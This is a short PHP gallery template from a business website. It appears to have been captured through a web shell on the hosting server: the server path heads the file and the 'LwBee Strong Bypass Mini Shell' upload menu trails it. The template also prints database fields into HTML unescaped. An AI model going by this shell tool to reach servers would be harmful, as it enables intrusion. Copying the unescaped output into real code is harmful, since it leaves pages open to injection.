/home3/vehiclea/public_html/sreemahadevgroup9/why_we.php
   <?php
    // include('include/include.php');
    // echo "SELECT * FROM gallery order by id desc limit 4";exit;
    $select_gallery = executework("SELECT * FROM gallery order by id desc limit 4");

   ?>
    <section class="ftco-section bg-light">
    	<div class="container">
				<div class="row justify-content-center mb-5 pb-3">
          <div class="col-md-7 heading-section text-center ftco-animate">
          	<!-- <span class="subheading">Special Offers</span> -->
            <h2 class="mb-4">Why Sree Mahadev Groups </h2>
          </div>
        </div>    		
    	</div>
    	<div class="container-fluid">
    		<div class="row">
          <?php
              while($row=mysqli_fetch_array($select_gallery)){   
          ?>
    			<div class="col-sm col-md-6 col-lg ftco-animate">
    				<div class="properties">
    					<a href="gallery.php" class="img img-2 d-flex justify-content-center align-items-center" style="background-image: url(Dashboard/<?= $row['image']?>);">
    						<div class="icon d-flex justify-content-center align-items-center">
    							<span class="icon-search2"></span>
    						</div>
    					</a>
    					<div class="text p-3">
                <h3 style="font-size: 25px;"><?= $row['name']?></h3>
                <hr>
              </div>
    				</div>
    			</div>
    			
    		<?php
          }
        ?>
    		</div>
    	</div>
    </section>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File